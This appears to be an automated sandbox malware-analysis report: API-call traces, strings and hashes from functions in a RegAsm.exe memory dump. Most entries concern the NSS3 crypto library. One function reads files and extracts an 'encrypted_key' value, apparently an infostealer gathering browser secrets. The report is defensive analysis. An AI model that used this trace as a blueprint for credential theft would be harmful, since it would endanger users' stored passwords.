strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CA7781D,00000000,6CA6BE2C,?,6CA76B1D,?,?,?,?,00000000,00000000,6CA7781D), ref: 6CA76C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CA7781D,?,6CA6BE2C,?), ref: 6CA76C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CA7781D), ref: 6CA76C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CA76C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CA76C96

Part of subcall function 6CA21240: TlsGetValue.KERNEL32(00000040,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21267
Part of subcall function 6CA21240: EnterCriticalSection.KERNEL32(?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA2127C
Part of subcall function 6CA21240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21291
Part of subcall function 6CA21240: PR_Unlock.NSS3(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA212A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CA76CAA

Strings

extern:, xrefs: 6CA76C7E
NSS_DEFAULT_DB_TYPE, xrefs: 6CA76C91
dbm:, xrefs: 6CA76C3A
sql:, xrefs: 6CA76C52
dbm, xrefs: 6CA76CA4
rdb:, xrefs: 6CA76C69

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 1c4289881e1c2b18eaab9d5721088aa70897ff1081e71c4333c46b590048a210
Instruction ID: ee5de8fd65f722e68146f42cd267d76fc69be0242c6cd4784abd6a8a15278dfc
Opcode Fuzzy Hash: 1c4289881e1c2b18eaab9d5721088aa70897ff1081e71c4333c46b590048a210
Instruction Fuzzy Hash: 3D0126F970338123FA20277AAC4AF26320CEF4216AF180531FE18F1A85EBD6E51442B5

Function 6CA84E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CA478F8), ref: 6CA84E6D

Part of subcall function 6CA209E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CA206A2,00000000,?), ref: 6CA209F8
Part of subcall function 6CA209E0: malloc.MOZGLUE(0000001F), ref: 6CA20A18
Part of subcall function 6CA209E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA20A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CA478F8), ref: 6CA84ED9

Part of subcall function 6CA75920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CA77703,?,00000000,00000000), ref: 6CA75942
Part of subcall function 6CA75920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CA77703), ref: 6CA75954
Part of subcall function 6CA75920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA7596A
Part of subcall function 6CA75920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA75984
Part of subcall function 6CA75920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CA75999
Part of subcall function 6CA75920: free.MOZGLUE(00000000), ref: 6CA759BA
Part of subcall function 6CA75920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CA759D3
Part of subcall function 6CA75920: free.MOZGLUE(00000000), ref: 6CA759F5
Part of subcall function 6CA75920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CA75A0A
Part of subcall function 6CA75920: free.MOZGLUE(00000000), ref: 6CA75A2E
Part of subcall function 6CA75920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CA75A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84EB3

Part of subcall function 6CA84820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CA84EB8,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA8484C
Part of subcall function 6CA84820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CA84EB8,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA8486D
Part of subcall function 6CA84820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CA84EB8,?), ref: 6CA84884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84EC0

Part of subcall function 6CA84470: TlsGetValue.KERNEL32(00000000,?,6CA47296,00000000), ref: 6CA84487
Part of subcall function 6CA84470: EnterCriticalSection.KERNEL32(?,?,?,6CA47296,00000000), ref: 6CA844A0
Part of subcall function 6CA84470: PR_Unlock.NSS3(?,?,?,?,6CA47296,00000000), ref: 6CA844BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA84F8F
PK11_UpdateSlotAttribute.NSS3(?,6CB5DCB0,00000000), ref: 6CA84FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CA8501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CA478F8), ref: 6CA8506B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 080cf086b129018f3a75ce14fe4b6b9f6664487bd892e39103f621f82a9bd9ab
Instruction ID: 61b0142e2e592415b3c1dc0f6877b5cc91a2b833db714fbe8517bec964a810d5
Opcode Fuzzy Hash: 080cf086b129018f3a75ce14fe4b6b9f6664487bd892e39103f621f82a9bd9ab
Instruction Fuzzy Hash: BB51D3B5D026059FEB11AF24ED05A9B36B8FF0531CF194635EC0687B12FB31D998CA92

Function 6CA2ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA2ACE2
malloc.MOZGLUE(00000001), ref: 6CA2ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA2AD02
TlsGetValue.KERNEL32 ref: 6CA2AD3C
calloc.MOZGLUE(00000001,?), ref: 6CA2AD8C
PR_Unlock.NSS3 ref: 6CA2ADC0
free.MOZGLUE(00000000), ref: 6CA2AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA2AE58
free.MOZGLUE(00000000), ref: 6CA2AE69
free.MOZGLUE(?), ref: 6CA2AE78
PR_Unlock.NSS3 ref: 6CA2AE8C
free.MOZGLUE(?), ref: 6CA2AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA2AEC7

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: f24419caa19676cf516481274b27c10a256fd71d66ac67916f0c33f6bc59964d
Instruction ID: 10e5e017668982c5aac192e97f5c1447fa3ba84750b27d9b7c0cab0de5536f1f
Opcode Fuzzy Hash: f24419caa19676cf516481274b27c10a256fd71d66ac67916f0c33f6bc59964d
Instruction Fuzzy Hash: A5519FB1E011259BDF00DF58D9817AE77BABB07348F1C4525D815A3B10D339AD99CBD2

Function 6CA6ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CA6ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA6AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA6AE29

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA6AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CA6AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA6AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CA6AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6CA6AE1F, 6CA6AE80
hKey = 0x%x, xrefs: 6CA6AE62, 6CA6AE72
hSession = 0x%x, xrefs: 6CA6AE01, 6CA6AE11
C_MessageSignInit, xrefs: 6CA6ADE1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 8d07853be877c9c2bee2cdfec889c70520cd5f80ff3eef0a6c44ada0929ae4a1
Instruction ID: cbd1305f00ed23eae1082d9ee90ca39bb8d5a3794cdf4eae728dddd9aa6cde70
Opcode Fuzzy Hash: 8d07853be877c9c2bee2cdfec889c70520cd5f80ff3eef0a6c44ada0929ae4a1
Instruction Fuzzy Hash: 57311835A00174AFCB009F15EE48BAE3776AF47318F484428E5089BF51DB349C9CCB92

Function 6CA69EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CA69F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA69F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA69F49

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA69F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CA69F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA69FAA
PR_LogPrint.NSS3(?,00000000), ref: 6CA69FC0

Strings

C_MessageEncryptInit, xrefs: 6CA69F01
(CK_INVALID_HANDLE), xrefs: 6CA69F3F, 6CA69FA0
hKey = 0x%x, xrefs: 6CA69F82, 6CA69F92
hSession = 0x%x, xrefs: 6CA69F21, 6CA69F31

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: 29f634248ae5f4bd41e071a8500a4719cf2e3a44dd8491099c7b68ea895bc136
Instruction ID: bf0b601ae3a024cd5d2d0a447c9526e1f64699d1411dec6d774529105b9104d4
Opcode Fuzzy Hash: 29f634248ae5f4bd41e071a8500a4719cf2e3a44dd8491099c7b68ea895bc136
Instruction Fuzzy Hash: 5831F835A01294ABDB009F25EF48BAE7775AB4731CF494428F50897F51DB30999CCB92

Function 6CB04C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CB04CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB04CFD
sqlite3_value_text16.NSS3(?), ref: 6CB04D44

Strings

out of memory, xrefs: 6CB04C78, 6CB04C9E
abort due to ROLLBACK, xrefs: 6CB04D27, 6CB04D33
bad parameter or other API misuse, xrefs: 6CB04D05
API call with %s database connection pointer, xrefs: 6CB04CF6
no more rows available, xrefs: 6CB04D2E
unknown error, xrefs: 6CB04D56
another row available, xrefs: 6CB04D20
invalid, xrefs: 6CB04CF1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 434fdc5204de89c00d9b48e4a8aa74f1c099c3953edcaa0222d3429172c35196
Instruction ID: 08269bf9ba798a02b41c32f397ff29213d851694e9ad2bb46d0d6b14f0a02187
Opcode Fuzzy Hash: 434fdc5204de89c00d9b48e4a8aa74f1c099c3953edcaa0222d3429172c35196
Instruction Fuzzy Hash: E3315AB3F488E1A7D7284625E8117A57B21F7A331DF154229DC244BE58C721AC65CFD3

Function 6CA62DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CA62DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA62E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA62E33

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA62E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA62E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA62E81

Strings

C_InitPIN, xrefs: 6CA62DF1
(CK_INVALID_HANDLE), xrefs: 6CA62E2C
ulPinLen = %d, xrefs: 6CA62E7C
pPin = 0x%p, xrefs: 6CA62E63
hSession = 0x%x, xrefs: 6CA62E0E, 6CA62E1E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 57feb5055db4b242969a2cf6d5364d0a25f1d56d4970d28648caf32a1c5aea9c
Instruction ID: 9e486a29a8f37ed6938d1f99a192d8c6fc701c836383a41bf6c9c4b3655a29e1
Opcode Fuzzy Hash: 57feb5055db4b242969a2cf6d5364d0a25f1d56d4970d28648caf32a1c5aea9c
Instruction Fuzzy Hash: E431F375A01194AFDB008F15EE4CB4A3B75EF47328F488124E908A7F51DB309D9CCBA2

Function 6CA66EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CA66F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA66F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA66F53

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA66F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CA66F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CA66FA1

Strings

C_DigestUpdate, xrefs: 6CA66F11
(CK_INVALID_HANDLE), xrefs: 6CA66F4C
hSession = 0x%x, xrefs: 6CA66F2E, 6CA66F3E
ulPartLen = %d, xrefs: 6CA66F9C
pPart = 0x%p, xrefs: 6CA66F83

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 67d366963e781d0212a5ef53666b593e3330746bee500af28959cf6156a1ea85
Instruction ID: aa661624a315a6215c80c024140f99ee9399fb5332c2054d18c1dd1cbe832ec9
Opcode Fuzzy Hash: 67d366963e781d0212a5ef53666b593e3330746bee500af28959cf6156a1ea85
Instruction Fuzzy Hash: C131C435A01194AFDB009F25EE48B9A7BB5EF47319F484025E808E7F11DB30999CCBD2

Function 6CA67E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6CA67E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA67E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA67E63

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA67E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CA67E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CA67EB1

Strings

(CK_INVALID_HANDLE), xrefs: 6CA67E5C
hSession = 0x%x, xrefs: 6CA67E3E, 6CA67E4E
C_VerifyUpdate, xrefs: 6CA67E21
ulPartLen = %d, xrefs: 6CA67EAC
pPart = 0x%p, xrefs: 6CA67E93

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
API String ID: 1003633598-2508624608
Opcode ID: d444a19a296257d88793d62d3d0285adb7fa892e2860d0bf7e96b72b6e7ce09d
Instruction ID: d5647478c77b539858bbad913002c3e5dfe8ede5f6af0c0bdf5097c7a110c6b7
Opcode Fuzzy Hash: d444a19a296257d88793d62d3d0285adb7fa892e2860d0bf7e96b72b6e7ce09d
Instruction Fuzzy Hash: C031D335A011A4AFDB009F65EE48F9A37B5AF47318F484024E90897E11DB309D9CCBA2

Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415845
_memset.LIBCMT ref: 00415856

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 0041596A
GlobalFree.KERNEL32(?), ref: 00415A8C

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415A18
StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
lstrcatA.KERNEL32(?,?), ref: 00415A54
lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
